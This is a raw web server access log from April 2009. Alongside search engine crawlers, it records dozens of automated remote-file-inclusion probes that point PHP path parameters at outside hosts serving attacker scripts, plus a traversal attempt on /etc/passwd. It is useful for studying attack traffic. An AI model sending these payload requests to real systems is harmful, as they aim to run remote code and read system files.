65.55.208.133 - - [09/Apr/2009:11:46:15 -0500] "GET /logs/access_log.1163548800 HTTP/1.1" 200 1397 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
119.147.24.160 - - [09/Apr/2009:11:47:20 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
119.147.24.160 - - [09/Apr/2009:11:47:20 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
119.147.24.160 - - [09/Apr/2009:11:47:21 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:11:47:27 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:11:47:27 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:11:47:27 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:11:48:15 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:11:48:20 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.7.216.240 - - [09/Apr/2009:11:48:20 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
119.147.24.160 - - [09/Apr/2009:11:56:12 -0500] "GET /logs///index.php?_zb_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
119.147.24.160 - - [09/Apr/2009:11:56:12 -0500] "GET ///index.php?_zb_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
119.147.24.160 - - [09/Apr/2009:11:56:12 -0500] "GET /logs/access_log.1233360000///index.php?_zb_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:12:04:53 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:12:04:53 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:12:04:53 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:12:05:09 -0500] "GET /logs/access_log.1231200000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
58.227.193.198 - - [09/Apr/2009:12:06:15 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
58.227.193.198 - - [09/Apr/2009:12:06:15 -0500] "GET /logs/access_log.1236297600//include/admin.lib.inc.php?site_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
58.227.193.198 - - [09/Apr/2009:12:06:15 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.80.197.27 - - [09/Apr/2009:12:06:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
88.80.197.27 - - [09/Apr/2009:12:06:25 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
66.249.71.203 - - [09/Apr/2009:12:06:25 -0500] "GET /logs/access_log.1175731200 HTTP/1.1" 200 1470 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.227.193.198 - - [09/Apr/2009:12:07:15 -0500] "GET /logs/access_log.1235433600//include/admin.lib.inc.php?site_path=http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.98.1.242 - - [09/Apr/2009:12:07:34 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.813"
208.98.1.242 - - [09/Apr/2009:12:07:34 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.813"
121.126.12.7 - - [09/Apr/2009:12:10:51 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.classicline.ru/cfe2faece98f606043f1594d8677f722/alba.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
121.126.12.7 - - [09/Apr/2009:12:10:52 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.classicline.ru/cfe2faece98f606043f1594d8677f722/alba.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
68.171.44.5 - - [09/Apr/2009:12:17:37 -0500] "GET /logs///index.php?_zb_path=http://isepic.tugaspeed.info/oltre.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
68.171.44.5 - - [09/Apr/2009:12:17:37 -0500] "GET ///index.php?_zb_path=http://isepic.tugaspeed.info/oltre.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
208.98.1.156 - - [09/Apr/2009:12:17:58 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://208.98.22.241/id.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
208.98.1.156 - - [09/Apr/2009:12:17:58 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://208.98.22.241/id.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
82.119.205.130 - - [09/Apr/2009:12:22:03 -0500] "GET /logs///index.php?_zb_path=http://isepic.tugaspeed.info/oltre.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
82.119.205.130 - - [09/Apr/2009:12:22:06 -0500] "GET ///index.php?_zb_path=http://isepic.tugaspeed.info/oltre.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
65.55.208.136 - - [09/Apr/2009:12:25:57 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [09/Apr/2009:12:25:58 -0500] "GET /logs/access_log.1154908800 HTTP/1.1" 200 2559 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [09/Apr/2009:12:28:52 -0500] "GET /logs/access_log.1133136000 HTTP/1.1" 200 3913 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [09/Apr/2009:12:28:52 -0500] "GET /logs/access_log.1108080000 HTTP/1.1" 200 192 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.30.65.26 - - [09/Apr/2009:12:46:06 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.65.26 - - [09/Apr/2009:12:46:08 -0500] "GET /logs/access_log.1109721600 HTTP/1.0" 200 2446 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.98.1.242 - - [09/Apr/2009:12:55:59 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.813"
208.98.1.242 - - [09/Apr/2009:12:55:59 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.813"
216.15.161.2 - - [09/Apr/2009:13:01:32 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.15.161.2 - - [09/Apr/2009:13:01:32 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.15.161.2 - - [09/Apr/2009:13:01:32 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.249.71.203 - - [09/Apr/2009:13:01:36 -0500] "GET /logs/access_log.1139097600 HTTP/1.1" 200 1338 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.15.161.2 - - [09/Apr/2009:13:01:50 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com//id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.15.161.2 - - [09/Apr/2009:13:01:50 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.15.161.2 - - [09/Apr/2009:13:01:50 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com//id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.18.117.101 - - [09/Apr/2009:13:04:06 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.18.117.101 - - [09/Apr/2009:13:04:06 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.18.117.101 - - [09/Apr/2009:13:04:06 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.18.117.101 - - [09/Apr/2009:13:04:24 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.18.117.101 - - [09/Apr/2009:13:04:24 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com//id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.18.117.101 - - [09/Apr/2009:13:04:24 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com//id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
200.234.200.133 - - [09/Apr/2009:13:11:24 -0500] "GET /logs/main.php?pagina=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
200.234.200.133 - - [09/Apr/2009:13:11:25 -0500] "GET /main.php?pagina=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
208.98.1.156 - - [09/Apr/2009:13:18:12 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
208.98.1.156 - - [09/Apr/2009:13:18:12 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
65.55.208.130 - - [09/Apr/2009:13:20:01 -0500] "GET /logs/access_log.1178755200 HTTP/1.1" 200 968 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [09/Apr/2009:13:20:01 -0500] "GET /logs/access_log.1188691200 HTTP/1.1" 200 1960 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
128.121.61.104 - - [09/Apr/2009:13:24:21 -0500] "GET /logs//zb41/include/write.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
128.121.61.104 - - [09/Apr/2009:13:24:22 -0500] "GET //zb41/include/write.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
128.121.61.104 - - [09/Apr/2009:13:24:23 -0500] "GET /logs/access_log.1231286400//zb41/include/write.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
212.227.114.187 - - [09/Apr/2009:13:25:23 -0500] "GET /logs/error.php?error=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.227.114.187 - - [09/Apr/2009:13:25:24 -0500] "GET /error.php?error=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
65.55.208.130 - - [09/Apr/2009:13:29:01 -0500] "GET /logs/access_log.1190592000 HTTP/1.1" 200 4022 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [09/Apr/2009:13:29:01 -0500] "GET /logs/access_log.1131062400 HTTP/1.1" 200 402 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.62.4.50 - - [09/Apr/2009:13:32:50 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.movie-net.tv/bbs/data/id.txt????? HTTP/1.1" 404 319 "-""libwww-perl/5.811"
209.62.4.50 - - [09/Apr/2009:13:32:50 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.movie-net.tv/bbs/data/id.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
222.236.44.38 - - [09/Apr/2009:13:35:42 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:13:35:42 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:13:35:42 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.227.114.187 - - [09/Apr/2009:13:42:50 -0500] "GET /logs/error.php?error=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
212.227.114.187 - - [09/Apr/2009:13:42:50 -0500] "GET /error.php?error=http://www.iconex.com.ph/id.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
222.236.44.38 - - [09/Apr/2009:13:48:04 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:13:48:04 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:13:48:04 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:13:48:10 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.190.100.135 - - [09/Apr/2009:13:48:43 -0500] "GET /logs//?path%5Bdocroot%5D=http://web191.c9.ibone.ch/hof/Albid.txt? HTTP/1.1" 200 184870 "-""libwww-perl/5.811"
213.190.100.135 - - [09/Apr/2009:13:48:43 -0500] "GET //?path%5Bdocroot%5D=http://web191.c9.ibone.ch/hof/Albid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
213.190.100.135 - - [09/Apr/2009:13:48:46 -0500] "GET /logs//?path%5Bdocroot%5D=http://web191.c9.ibone.ch/hof/Albid.txt? HTTP/1.1" 200 184870 "-""libwww-perl/5.811"
213.190.100.135 - - [09/Apr/2009:13:48:47 -0500] "GET //?path%5Bdocroot%5D=http://web191.c9.ibone.ch/hof/Albid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
213.190.100.135 - - [09/Apr/2009:13:48:47 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 200 184870 "-""libwww-perl/5.811"
213.190.100.135 - - [09/Apr/2009:13:48:47 -0500] "GET //?path%5Bdocroot%5D=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
128.121.61.104 - - [09/Apr/2009:13:52:42 -0500] "GET /logs/access_log.1231804800//zb41/include/write.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.98.1.242 - - [09/Apr/2009:13:54:21 -0500] "GET /errors.php?error=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
208.98.1.242 - - [09/Apr/2009:13:54:21 -0500] "GET /logs/errors.php?error=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
66.249.71.203 - - [09/Apr/2009:13:58:14 -0500] "GET /logs/access_log.1192233600 HTTP/1.1" 200 1409 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.98.1.156 - - [09/Apr/2009:13:59:57 -0500] "GET /logs/errors.php?error=http://208.98.22.241/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
208.98.1.156 - - [09/Apr/2009:13:59:57 -0500] "GET /errors.php?error=http://208.98.22.241/id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.208.125 - - [09/Apr/2009:14:06:05 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:06:06 -0500] "GET /logs/access_log.1154822400 HTTP/1.1" 200 2551 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:06:09 -0500] "GET /logs/access_log.1185148800 HTTP/1.1" 200 1623 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:06:11 -0500] "GET /logs/access_log.1162944000 HTTP/1.1" 200 327 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:07:02 -0500] "GET /logs/access_log.1135296000 HTTP/1.1" 200 663 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:07:02 -0500] "GET /logs/access_log.1112486400 HTTP/1.1" 200 334 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:07:02 -0500] "GET /logs/access_log.1136505600 HTTP/1.1" 200 2717 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:07:03 -0500] "GET /logs/access_log.1202688000 HTTP/1.1" 200 674 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:07:03 -0500] "GET /logs/access_log.1158624000 HTTP/1.1" 200 986 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:07:03 -0500] "GET /logs/access_log.1190160000 HTTP/1.1" 200 5368 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:07:03 -0500] "GET /logs/access_log.1152662400 HTTP/1.1" 200 661 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [09/Apr/2009:14:07:04 -0500] "GET /logs/access_log.1210636800 HTTP/1.1" 200 3144 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.187.131.186 - - [09/Apr/2009:14:07:32 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:14:07:32 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.187.131.186 - - [09/Apr/2009:14:07:32 -0500] "GET /logs/access_log.1236729600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:14:10:34 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:14:10:34 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:14:10:34 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:14:10:42 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:14:11:27 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:14:11:27 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:14:11:27 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:14:11:33 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.208.134 - - [09/Apr/2009:14:25:24 -0500] "GET /logs/access_log.1237334400 HTTP/1.1" 200 254108 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.13.35.137 - - [09/Apr/2009:14:31:51 -0500] "GET /logs//_test_holidays.php?APB_rp=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
212.13.35.137 - - [09/Apr/2009:14:31:51 -0500] "GET //_test_holidays.php?APB_rp=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
87.106.210.58 - - [09/Apr/2009:14:34:31 -0500] "GET /logs/.rfi%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.106.210.58 - - [09/Apr/2009:14:34:31 -0500] "GET /logs/access_log.1236729600/.rfi%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
87.106.210.58 - - [09/Apr/2009:14:34:31 -0500] "GET /.rfi%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.13.35.137 - - [09/Apr/2009:14:44:55 -0500] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.13.35.137 - - [09/Apr/2009:14:44:55 -0500] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
212.13.35.137 - - [09/Apr/2009:14:48:07 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.13.35.137 - - [09/Apr/2009:14:48:08 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
212.13.35.137 - - [09/Apr/2009:14:48:18 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.13.35.137 - - [09/Apr/2009:14:48:18 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
216.45.58.138 - - [09/Apr/2009:14:49:05 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://rackhost.t35.com/chid??? HTTP/1.1" 404 319 "-""libwww-perl/5.816"
216.45.58.138 - - [09/Apr/2009:14:49:06 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://rackhost.t35.com/chid??? HTTP/1.1" 404 314 "-""libwww-perl/5.816"
212.13.35.137 - - [09/Apr/2009:14:49:12 -0500] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.13.35.137 - - [09/Apr/2009:14:49:13 -0500] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
219.85.63.226 - - [09/Apr/2009:14:55:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chezfinn.com/files/ts??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
87.106.29.58 - - [09/Apr/2009:15:02:24 -0500] "GET /index.php?configFile=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
